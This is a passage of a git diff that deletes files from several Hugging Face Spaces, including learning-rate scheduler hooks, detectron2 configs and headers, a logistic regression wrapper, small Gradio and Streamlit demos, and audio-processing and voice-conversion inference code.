min_lr_ratio=None, - **kwargs): - assert (min_lr is None) ^ (min_lr_ratio is None) - self.periods = periods - self.min_lr = min_lr - self.min_lr_ratio = min_lr_ratio - self.restart_weights = restart_weights - assert (len(self.periods) == len(self.restart_weights) - ), 'periods and restart_weights should have the same length.' - super(CosineRestartLrUpdaterHook, self).__init__(**kwargs) - - self.cumulative_periods = [ - sum(self.periods[0:i + 1]) for i in range(0, len(self.periods)) - ] - - def get_lr(self, runner, base_lr): - if self.by_epoch: - progress = runner.epoch - else: - progress = runner.iter - - if self.min_lr_ratio is not None: - target_lr = base_lr * self.min_lr_ratio - else: - target_lr = self.min_lr - - idx = get_position_from_periods(progress, self.cumulative_periods) - current_weight = self.restart_weights[idx] - nearest_restart = 0 if idx == 0 else self.cumulative_periods[idx - 1] - current_periods = self.periods[idx] - - alpha = min((progress - nearest_restart) / current_periods, 1) - return annealing_cos(base_lr, target_lr, alpha, current_weight) - - -def get_position_from_periods(iteration, cumulative_periods): - """Get the position from a period list. - - It will return the index of the right-closest number in the period list. - For example, the cumulative_periods = [100, 200, 300, 400], - if iteration == 50, return 0; - if iteration == 210, return 2; - if iteration == 300, return 3. - - Args: - iteration (int): Current iteration. - cumulative_periods (list[int]): Cumulative period list. - - Returns: - int: The position of the right-closest number in the period list. - """ - for i, period in enumerate(cumulative_periods): - if iteration < period: - return i - raise ValueError(f'Current iteration {iteration} exceeds ' - f'cumulative_periods {cumulative_periods}') - - -@HOOKS.register_module() -class CyclicLrUpdaterHook(LrUpdaterHook): - """Cyclic LR Scheduler. - - Implement the cyclical learning rate policy (CLR) described in - https://arxiv.org/pdf/1506.01186.pdf - - Different from the original paper, we use cosine annealing rather than - triangular policy inside a cycle. This improves the performance in the - 3D detection area. - - Args: - by_epoch (bool): Whether to update LR by epoch. - target_ratio (tuple[float]): Relative ratio of the highest LR and the - lowest LR to the initial LR. - cyclic_times (int): Number of cycles during training - step_ratio_up (float): The ratio of the increasing process of LR in - the total cycle. - anneal_strategy (str): {'cos', 'linear'} - Specifies the annealing strategy: 'cos' for cosine annealing, - 'linear' for linear annealing. Default: 'cos'. - """ - - def __init__(self, - by_epoch=False, - target_ratio=(10, 1e-4), - cyclic_times=1, - step_ratio_up=0.4, - anneal_strategy='cos', - **kwargs): - if isinstance(target_ratio, float): - target_ratio = (target_ratio, target_ratio / 1e5) - elif isinstance(target_ratio, tuple): - target_ratio = (target_ratio[0], target_ratio[0] / 1e5) \ - if len(target_ratio) == 1 else target_ratio - else: - raise ValueError('target_ratio should be either float ' - f'or tuple, got {type(target_ratio)}') - - assert len(target_ratio) == 2, \ - '"target_ratio" must be list or tuple of two floats' - assert 0 <= step_ratio_up < 1.0, \ - '"step_ratio_up" must be in range [0,1)' - - self.target_ratio = target_ratio - self.cyclic_times = cyclic_times - self.step_ratio_up = step_ratio_up - self.lr_phases = [] # init lr_phases - # validate anneal_strategy - if anneal_strategy not in ['cos', 'linear']: - raise ValueError('anneal_strategy must be one of "cos" or ' - f'"linear", instead got {anneal_strategy}') - elif anneal_strategy == 'cos': - self.anneal_func = annealing_cos - elif anneal_strategy == 'linear': - self.anneal_func = annealing_linear - - assert not by_epoch, \ - 'currently only support "by_epoch" = False' - super(CyclicLrUpdaterHook, self).__init__(by_epoch, **kwargs) - - def before_run(self, runner): - super(CyclicLrUpdaterHook, self).before_run(runner) - # initiate lr_phases - # total lr_phases are separated as up and down - max_iter_per_phase = runner.max_iters // self.cyclic_times - iter_up_phase = int(self.step_ratio_up * max_iter_per_phase) - self.lr_phases.append( - [0, iter_up_phase, max_iter_per_phase, 1, self.target_ratio[0]]) - self.lr_phases.append([ - iter_up_phase, max_iter_per_phase, max_iter_per_phase, - self.target_ratio[0], self.target_ratio[1] - ]) - - def get_lr(self, runner, base_lr): - curr_iter = runner.iter - for (start_iter, end_iter, max_iter_per_phase, start_ratio, - end_ratio) in self.lr_phases: - curr_iter %= max_iter_per_phase - if start_iter <= curr_iter < end_iter: - progress = curr_iter - start_iter - return self.anneal_func(base_lr * start_ratio, - base_lr * end_ratio, - progress / (end_iter - start_iter)) - - -@HOOKS.register_module() -class OneCycleLrUpdaterHook(LrUpdaterHook): - """One Cycle LR Scheduler. - - The 1cycle learning rate policy changes the learning rate after every - batch. The one cycle learning rate policy is described in - https://arxiv.org/pdf/1708.07120.pdf - - Args: - max_lr (float or list): Upper learning rate boundaries in the cycle - for each parameter group. - total_steps (int, optional): The total number of steps in the cycle. - Note that if a value is not provided here, it will be the max_iter - of runner. Default: None. - pct_start (float): The percentage of the cycle (in number of steps) - spent increasing the learning rate. - Default: 0.3 - anneal_strategy (str): {'cos', 'linear'} - Specifies the annealing strategy: 'cos' for cosine annealing, - 'linear' for linear annealing. - Default: 'cos' - div_factor (float): Determines the initial learning rate via - initial_lr = max_lr/div_factor - Default: 25 - final_div_factor (float): Determines the minimum learning rate via - min_lr = initial_lr/final_div_factor - Default: 1e4 - three_phase (bool): If three_phase is True, use a third phase of the - schedule to annihilate the learning rate according to - final_div_factor instead of modifying the second phase (the first - two phases will be symmetrical about the step indicated by - pct_start). - Default: False - """ - - def __init__(self, - max_lr, - total_steps=None, - pct_start=0.3, - anneal_strategy='cos', - div_factor=25, - final_div_factor=1e4, - three_phase=False, - **kwargs): - # validate by_epoch, currently only support by_epoch = False - if 'by_epoch' not in kwargs: - kwargs['by_epoch'] = False - else: - assert not kwargs['by_epoch'], \ - 'currently only support "by_epoch" = False' - if not isinstance(max_lr, (numbers.Number, list, dict)): - raise ValueError('the type of max_lr must be the one of list or ' - f'dict, but got {type(max_lr)}') - self._max_lr = max_lr - if total_steps is not None: - if not isinstance(total_steps, int): - raise ValueError('the type of total_steps must be int, but' - f'got {type(total_steps)}') - self.total_steps = total_steps - # validate pct_start - if pct_start < 0 or pct_start > 1 or not isinstance(pct_start, float): - raise ValueError('expected float between 0 and 1 pct_start, but ' - f'got {pct_start}') - self.pct_start = pct_start - # validate anneal_strategy - if anneal_strategy not in ['cos', 'linear']: - raise ValueError('anneal_strategy must be one of "cos" or ' - f'"linear", instead got {anneal_strategy}') - elif anneal_strategy == 'cos': - self.anneal_func = annealing_cos - elif anneal_strategy == 'linear': - self.anneal_func = annealing_linear - self.div_factor = div_factor - self.final_div_factor = final_div_factor - self.three_phase = three_phase - self.lr_phases = [] # init lr_phases - super(OneCycleLrUpdaterHook, self).__init__(**kwargs) - - def before_run(self, runner): - if hasattr(self, 'total_steps'): - total_steps = self.total_steps - else: - total_steps = runner.max_iters - if total_steps < runner.max_iters: - raise ValueError( - 'The total steps must be greater than or equal to max ' - f'iterations {runner.max_iters} of runner, but total steps ' - f'is {total_steps}.') - - if isinstance(runner.optimizer, dict): - self.base_lr = {} - for k, optim in runner.optimizer.items(): - _max_lr = format_param(k, optim, self._max_lr) - self.base_lr[k] = [lr / self.div_factor for lr in _max_lr] - for group, lr in zip(optim.param_groups, self.base_lr[k]): - group.setdefault('initial_lr', lr) - else: - k = type(runner.optimizer).__name__ - _max_lr = format_param(k, runner.optimizer, self._max_lr) - self.base_lr = [lr / self.div_factor for lr in _max_lr] - for group, lr in zip(runner.optimizer.param_groups, self.base_lr): - group.setdefault('initial_lr', lr) - - if self.three_phase: - self.lr_phases.append( - [float(self.pct_start * total_steps) - 1, 1, self.div_factor]) - self.lr_phases.append([ - float(2 * self.pct_start * total_steps) - 2, self.div_factor, 1 - ]) - self.lr_phases.append( - [total_steps - 1, 1, 1 / self.final_div_factor]) - else: - self.lr_phases.append( - [float(self.pct_start * total_steps) - 1, 1, self.div_factor]) - self.lr_phases.append( - [total_steps - 1, self.div_factor, 1 / self.final_div_factor]) - - def get_lr(self, runner, base_lr): - curr_iter = runner.iter - start_iter = 0 - for i, (end_iter, start_lr, end_lr) in enumerate(self.lr_phases): - if curr_iter <= end_iter: - pct = (curr_iter - start_iter) / (end_iter - start_iter) - lr = self.anneal_func(base_lr * start_lr, base_lr * end_lr, - pct) - break - start_iter = end_iter - return lr - - -def annealing_cos(start, end, factor, weight=1): - """Calculate annealing cos learning rate. - - Cosine anneal from `weight * start + (1 - weight) * end` to `end` as - percentage goes from 0.0 to 1.0. - - Args: - start (float): The starting learning rate of the cosine annealing. - end (float): The ending learing rate of the cosine annealing. - factor (float): The coefficient of `pi` when calculating the current - percentage. Range from 0.0 to 1.0. - weight (float, optional): The combination factor of `start` and `end` - when calculating the actual starting learning rate. Default to 1. - """ - cos_out = cos(pi * factor) + 1 - return end + 0.5 * weight * (start - end) * cos_out - - -def annealing_linear(start, end, factor): - """Calculate annealing linear learning rate. - - Linear anneal from `start` to `end` as percentage goes from 0.0 to 1.0. - - Args: - start (float): The starting learning rate of the linear annealing. - end (float): The ending learing rate of the linear annealing. - factor (float): The coefficient of `pi` when calculating the current - percentage. Range from 0.0 to 1.0. - """ - return start + (end - start) * factor - - -def format_param(name, optim, param): - if isinstance(param, numbers.Number): - return [param] * len(optim.param_groups) - elif isinstance(param, (list, tuple)): # multi param groups - if len(param) != len(optim.param_groups): - raise ValueError(f'expected {len(optim.param_groups)} ' - f'values for {name}, got {len(param)}') - return param - else: # multi optimizers - if name not in param: - raise KeyError(f'{name} is not found in {param.keys()}') - return param[name] diff --git a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/configs/common/models/fcos.py b/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/configs/common/models/fcos.py deleted file mode 100644 index 1c752029b7fc64ec375a55182e5342c9eb48bb33..0000000000000000000000000000000000000000 --- a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/configs/common/models/fcos.py +++ /dev/null @@ -1,23 +0,0 @@ -from detectron2.modeling.meta_arch.fcos import FCOS, FCOSHead - -from .retinanet import model - -model._target_ = FCOS - -del model.anchor_generator -del model.box2box_transform -del model.anchor_matcher -del model.input_format - -# Use P5 instead of C5 to compute P6/P7 -# (Sec 2.2 of https://arxiv.org/abs/2006.09214) -model.backbone.top_block.in_feature = "p5" -model.backbone.top_block.in_channels = 256 - -# New score threshold determined based on sqrt(cls_score * centerness) -model.test_score_thresh = 0.2 -model.test_nms_thresh = 0.6 - -model.head._target_ = FCOSHead -del model.head.num_anchors -model.head.norm = "GN" diff --git a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/detectron2/layers/csrc/nms_rotated/nms_rotated.h b/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/detectron2/layers/csrc/nms_rotated/nms_rotated.h deleted file mode 100644 index 12aca388e47b12dafd20999f2991a9d42f4b904b..0000000000000000000000000000000000000000 --- a/spaces/TencentARC/VLog/models/grit_src/third_party/CenterNet2/detectron2/layers/csrc/nms_rotated/nms_rotated.h +++ /dev/null @@ -1,39 +0,0 @@ -// Copyright (c) Facebook, Inc. and its affiliates. -#pragma once -#include - -namespace detectron2 { - -at::Tensor nms_rotated_cpu( - const at::Tensor& dets, - const at::Tensor& scores, - const double iou_threshold); - -#if defined(WITH_CUDA) || defined(WITH_HIP) -at::Tensor nms_rotated_cuda( - const at::Tensor& dets, - const at::Tensor& scores, - const double iou_threshold); -#endif - -// Interface for Python -// inline is needed to prevent multiple function definitions when this header is -// included by different cpps -inline at::Tensor nms_rotated( - const at::Tensor& dets, - const at::Tensor& scores, - const double iou_threshold) { - assert(dets.device().is_cuda() == scores.device().is_cuda()); - if (dets.device().is_cuda()) { -#if defined(WITH_CUDA) || defined(WITH_HIP) - return nms_rotated_cuda( - dets.contiguous(), scores.contiguous(), iou_threshold); -#else - AT_ERROR("Detectron2 is not compiled with GPU support!"); -#endif - } - - return nms_rotated_cpu(dets.contiguous(), scores.contiguous(), iou_threshold); -} - -} // namespace detectron2 diff --git a/spaces/ThirdEyeData/Customer-Conversion-Prediction/supv/lrd.py b/spaces/ThirdEyeData/Customer-Conversion-Prediction/supv/lrd.py deleted file mode 100644 index b476e477f642adfb93e5a71b19b0877f6b3eda92..0000000000000000000000000000000000000000 --- a/spaces/ThirdEyeData/Customer-Conversion-Prediction/supv/lrd.py +++ /dev/null @@ -1,112 +0,0 @@ -#!/usr/local/bin/python3 - -# avenir-python: Machine Learning -# Author: Pranab Ghosh -# -# Licensed under the Apache License, Version 2.0 (the "License"); you -# may not use this file except in compliance with the License. You may -# obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or -# implied. See the License for the specific language governing -# permissions and limitations under the License. - -# Package imports -import os -import sys -import matplotlib.pyplot as plt -import numpy as np -import sklearn as sk -import sklearn.linear_model -import matplotlib -import random -import jprops -from sklearn.linear_model import LogisticRegression -from random import randint -sys.path.append(os.path.abspath("../lib")) -from util import * -from mlutil import * -from pasearch import * -from bacl import * - -# logistic regression classification -class LogisticRegressionDiscriminant(BaseClassifier): - - def __init__(self, configFile): - defValues = {} - defValues["common.mode"] = ("train", None) - defValues["common.model.directory"] = ("model", None) - defValues["common.model.file"] = (None, None) - defValues["common.scale.file.path"] = (None, "missing scale file path") - defValues["common.preprocessing"] = (None, None) - defValues["common.verbose"] = (False, None) - defValues["train.data.file"] = (None, "missing training data file") - defValues["train.data.fields"] = (None, "missing training data field ordinals") - defValues["train.data.feature.fields"] = (None, "missing training data feature field ordinals") - defValues["train.data.class.field"] = (None, "missing class field ordinal") - defValues["train.validation"] = ("kfold", None) - defValues["train.num.folds"] = (5, None) - defValues["train.penalty"] = ("l2", None) - defValues["train.dual"] = (False, None) - defValues["train.tolerance"] = (0.0001, None) - defValues["train.regularization"] = (1.0, None) - defValues["train.fit.intercept"] = (True, None) - defValues["train.intercept.scaling"] = (1.0, None) - defValues["train.class.weight"] = (None, None) - defValues["train.random.state"] = (None, None) - defValues["train.solver"] = ("liblinear", None) - defValues["train.max.iter"] = (100, None) - defValues["train.multi.class"] = ("ovr", None) - defValues["train.verbose"] = (0, None) - defValues["train.warm.start"] = (False, None) - defValues["train.num.jobs"] = (None, None) - defValues["train.l1.ratio"] = (None, None) - defValues["train.success.criterion"] = ("error", None) - defValues["train.model.save"] = (False, None) - defValues["train.score.method"] = ("accuracy", None) - defValues["train.search.param.strategy"] = (None, None) - defValues["train.search.params"] = (None, None) - defValues["predict.data.file"] = (None, None) - defValues["predict.data.fields"] = (None, "missing data field ordinals") - defValues["predict.data.feature.fields"] = (None, "missing data feature field ordinals") - defValues["predict.use.saved.model"] = (False, None) - defValues["validate.data.file"] = (None, "missing validation data file") - defValues["validate.data.fields"] = (None, "missing validation data field ordinals") - defValues["validate.data.feature.fields"] = (None, "missing validation data feature field ordinals") - defValues["validate.data.class.field"] = (None, "missing class field ordinal") - defValues["validate.use.saved.model"] = (False, None) - defValues["validate.score.method"] = ("accuracy", None) - - super(LogisticRegressionDiscriminant, self).__init__(configFile, defValues, __name__) - - # builds model object - def buildModel(self): - print ("...building logistic regression model") - penalty = self.config.getStringConfig("train.penalty")[0] - dual = self.config.getBooleanConfig("train.dual")[0] - tol = self.config.getFloatConfig("train.tolerance")[0] - c = self.config.getFloatConfig("train.regularization")[0] - fitIntercept = self.config.getBooleanConfig("train.fit.intercept")[0] - interceptScaling = self.config.getFloatConfig("train.intercept.scaling")[0] - classWeight = self.config.getStringConfig("train.class.weight")[0] - randomState = self.config.getIntConfig("train.random.state")[0] - solver = self.config.getStringConfig("train.solver")[0] - maxIter = self.config.getIntConfig("train.max.iter")[0] - multiClass = self.config.getStringConfig("train.multi.class")[0] - verbos = self.config.getIntConfig("train.verbose")[0] - warmStart = self.config.getBooleanConfig("train.warm.start")[0] - nJobs = self.config.getIntConfig("train.num.jobs")[0] - l1Ratio = self.config.getFloatConfig("train.l1.ratio")[0] - - self.classifier = LogisticRegression(penalty=penalty, dual=dual, tol=tol, C=c, fit_intercept=fitIntercept,\ - intercept_scaling=interceptScaling, class_weight=classWeight, random_state=randomState, solver=solver,\ - max_iter=maxIter, multi_class=multiClass, verbose=verbos, warm_start=warmStart, n_jobs=nJobs, l1_ratio=l1Ratio) - - return self.classifier - - - diff --git a/spaces/UglyLemon/LEMONTR/app.py b/spaces/UglyLemon/LEMONTR/app.py deleted file mode 100644 index 5840c4a717bf730cfd0948402c81feb0bfed8c2d..0000000000000000000000000000000000000000 --- a/spaces/UglyLemon/LEMONTR/app.py +++ /dev/null @@ -1,9 +0,0 @@ -import streamlit as st -from transformers import pipeline - -pipe = pipeline('sentiment-analysis') -text = st.text_area('enter some text!') - -if text - out = pipe(text) - st.json(out) \ No newline at end of file diff --git a/spaces/VIPLab/Track-Anything/app_test.py b/spaces/VIPLab/Track-Anything/app_test.py deleted file mode 100644 index cd10fe77cec552dffba84c6516ec33a6622b6c38..0000000000000000000000000000000000000000 --- a/spaces/VIPLab/Track-Anything/app_test.py +++ /dev/null @@ -1,46 +0,0 @@ -# import gradio as gr - -# def update_iframe(slider_value): -# return f''' -# -# -# ''' - -# iface = gr.Interface( -# fn=update_iframe, -# inputs=gr.inputs.Slider(minimum=0, maximum=100, step=1, default=50), -# outputs=gr.outputs.HTML(), -# allow_flagging=False, -# ) - -# iface.launch(server_name='0.0.0.0', server_port=12212) - -import gradio as gr - - -def change_mask(drop): - return gr.update(choices=["hello", "kitty"]) - -with gr.Blocks() as iface: - drop = gr.Dropdown( - choices=["cat", "dog", "bird"], label="Animal", info="Will add more animals later!" - ) - radio = gr.Radio(["park", "zoo", "road"], label="Location", info="Where did they go?") - multi_drop = gr.Dropdown( - ["ran", "swam", "ate", "slept"], value=["swam", "slept"], multiselect=True, label="Activity", info="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed auctor, nisl eget ultricies aliquam, nunc nisl aliquet nunc, eget aliquam nisl nunc vel nisl." - ) - - multi_drop.change( - fn=change_mask, - inputs = multi_drop, - outputs=multi_drop - ) - -iface.launch(server_name='0.0.0.0', server_port=1223) \ No newline at end of file diff --git a/spaces/WatchOutForMike/Character/app.py b/spaces/WatchOutForMike/Character/app.py deleted file mode 100644 index c04b6d45f84686618444749797188ca31fcb9882..0000000000000000000000000000000000000000 --- a/spaces/WatchOutForMike/Character/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/prompthero/openjourney-v4").launch() \ No newline at end of file diff --git a/spaces/Xyan-shuo2/Shoshoo/README.md b/spaces/Xyan-shuo2/Shoshoo/README.md deleted file mode 100644 index f72b01c4c37e1c4ac0585d7ea6e2235f5fde5839..0000000000000000000000000000000000000000 --- a/spaces/Xyan-shuo2/Shoshoo/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Shoshoo -emoji: 🌍 -colorFrom: green -colorTo: red -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/XzJosh/Taffy-Bert-VITS2/mel_processing.py b/spaces/XzJosh/Taffy-Bert-VITS2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Taffy-Bert-VITS2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/YazawaSunrise/so-vits-svc-LoveLive/inference/infer_tool_grad.py b/spaces/YazawaSunrise/so-vits-svc-LoveLive/inference/infer_tool_grad.py deleted file mode 100644 index 39359a82e5cc288c7c3f41e58c7c0c954581b14f..0000000000000000000000000000000000000000 --- a/spaces/YazawaSunrise/so-vits-svc-LoveLive/inference/infer_tool_grad.py +++ /dev/null @@ -1,160 +0,0 @@ -import hashlib -import json -import logging -import os -import time -from pathlib import Path -import io -import librosa -import maad -import numpy as np -from inference import slicer -import parselmouth -import soundfile -import torch -import torchaudio - -from hubert import hubert_model -import utils -from models import SynthesizerTrn -logging.getLogger('numba').setLevel(logging.WARNING) -logging.getLogger('matplotlib').setLevel(logging.WARNING) - -def resize2d_f0(x, target_len): - source = np.array(x) - source[source < 0.001] = np.nan - target = np.interp(np.arange(0, len(source) * target_len, len(source)) / target_len, np.arange(0, len(source)), - source) - res = np.nan_to_num(target) - return res - -def get_f0(x, p_len,f0_up_key=0): - - time_step = 160 / 16000 * 1000 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - - f0 = parselmouth.Sound(x, 16000).to_pitch_ac( - time_step=time_step / 1000, voicing_threshold=0.6, - pitch_floor=f0_min, pitch_ceiling=f0_max).selected_array['frequency'] - - pad_size=(p_len - len(f0) + 1) // 2 - if(pad_size>0 or p_len - len(f0) - pad_size>0): - f0 = np.pad(f0,[[pad_size,p_len - len(f0) - pad_size]], mode='constant') - - f0 *= pow(2, f0_up_key / 12) - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / (f0_mel_max - f0_mel_min) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0 - -def clean_pitch(input_pitch): - num_nan = np.sum(input_pitch == 1) - if num_nan / len(input_pitch) > 0.9: - input_pitch[input_pitch != 1] = 1 - return input_pitch - - -def plt_pitch(input_pitch): - input_pitch = input_pitch.astype(float) - input_pitch[input_pitch == 1] = np.nan - return input_pitch - - -def f0_to_pitch(ff): - f0_pitch = 69 + 12 * np.log2(ff / 440) - return f0_pitch - - -def fill_a_to_b(a, b): - if len(a) < len(b): - for _ in range(0, len(b) - len(a)): - a.append(a[0]) - - -def mkdir(paths: list): - for path in paths: - if not os.path.exists(path): - os.mkdir(path) - - -class VitsSvc(object): - def __init__(self): - self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - self.SVCVITS = None - self.hps = None - self.speakers = None - self.hubert_soft = hubert_model.hubert_soft("hubert/model.pt") - - def set_device(self, device): - self.device = torch.device(device) - self.hubert_soft.to(self.device) - if self.SVCVITS != None: - self.SVCVITS.to(self.device) - - def loadCheckpoint(self, path): - self.hps = utils.get_hparams_from_file(f"checkpoints/{path}/config.json") - self.SVCVITS = SynthesizerTrn( - self.hps.data.filter_length // 2 + 1, - self.hps.train.segment_size // self.hps.data.hop_length, - **self.hps.model) - _ = utils.load_checkpoint(f"checkpoints/{path}/model.pth", self.SVCVITS, None) - _ = self.SVCVITS.eval().to(self.device) - self.speakers = self.hps.spk - - def get_units(self, source, sr): - source = source.unsqueeze(0).to(self.device) - with torch.inference_mode(): - units = self.hubert_soft.units(source) - return units - - - def get_unit_pitch(self, in_path, tran): - source, sr = torchaudio.load(in_path) - source = torchaudio.functional.resample(source, sr, 16000) - if len(source.shape) == 2 and source.shape[1] >= 2: - source = torch.mean(source, dim=0).unsqueeze(0) - soft = self.get_units(source, sr).squeeze(0).cpu().numpy() - f0_coarse, f0 = get_f0(source.cpu().numpy()[0], soft.shape[0]*2, tran) - return soft, f0 - - def infer(self, speaker_id, tran, raw_path): - speaker_id = self.speakers[speaker_id] - sid = torch.LongTensor([int(speaker_id)]).to(self.device).unsqueeze(0) - soft, pitch = self.get_unit_pitch(raw_path, tran) - f0 = torch.FloatTensor(clean_pitch(pitch)).unsqueeze(0).to(self.device) - stn_tst = torch.FloatTensor(soft) - with torch.no_grad(): - x_tst = stn_tst.unsqueeze(0).to(self.device) - x_tst = torch.repeat_interleave(x_tst, repeats=2, dim=1).transpose(1, 2) - audio = self.SVCVITS.infer(x_tst, f0=f0, g=sid)[0,0].data.float() - return audio, audio.shape[-1] - - def inference(self,srcaudio,chara,tran,slice_db): - sampling_rate, audio = srcaudio - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - soundfile.write("tmpwav.wav", audio, 16000, format="wav") - chunks = slicer.cut("tmpwav.wav", db_thresh=slice_db) - audio_data, audio_sr = slicer.chunks2audio("tmpwav.wav", chunks) - audio = [] - for (slice_tag, data) in audio_data: - length = int(np.ceil(len(data) / audio_sr * self.hps.data.sampling_rate)) - raw_path = io.BytesIO() - soundfile.write(raw_path, data, audio_sr, format="wav") - raw_path.seek(0) - if slice_tag: - _audio = np.zeros(length) - else: - out_audio, out_sr = self.infer(chara, tran, raw_path) - _audio = out_audio.cpu().numpy() - audio.extend(list(_audio)) - audio = (np.array(audio) * 32768.0).astype('int16') - return (self.hps.data.sampling_rate,audio) diff --git a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/checkpoint/catalog.py b/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/checkpoint/catalog.py deleted file mode 100644 index 9a85736754a0de4550df96c22f38fc515bd02d71..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/checkpoint/catalog.py +++ /dev/null @@ -1,115 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging - -from detectron2.utils.file_io import PathHandler, PathManager - - -class ModelCatalog(object): - """ - Store mappings from names to third-party models. - """ - - S3_C2_DETECTRON_PREFIX = "https://dl.fbaipublicfiles.com/detectron" - - # MSRA models have STRIDE_IN_1X1=True. False otherwise. - # NOTE: all BN models here have fused BN into an affine layer. - # As a result, you should only load them to a model with "FrozenBN". - # Loading them to a model with regular BN or SyncBN is wrong. - # Even when loaded to FrozenBN, it is still different from affine by an epsilon, - # which should be negligible for training. - # NOTE: all models here uses PIXEL_STD=[1,1,1] - # NOTE: Most of the BN models here are no longer used. We use the - # re-converted pre-trained models under detectron2 model zoo instead. - C2_IMAGENET_MODELS = { - "MSRA/R-50": "ImageNetPretrained/MSRA/R-50.pkl", - "MSRA/R-101": "ImageNetPretrained/MSRA/R-101.pkl", - "FAIR/R-50-GN": "ImageNetPretrained/47261647/R-50-GN.pkl", - "FAIR/R-101-GN": "ImageNetPretrained/47592356/R-101-GN.pkl", - "FAIR/X-101-32x8d": "ImageNetPretrained/20171220/X-101-32x8d.pkl", - "FAIR/X-101-64x4d": "ImageNetPretrained/FBResNeXt/X-101-64x4d.pkl", - 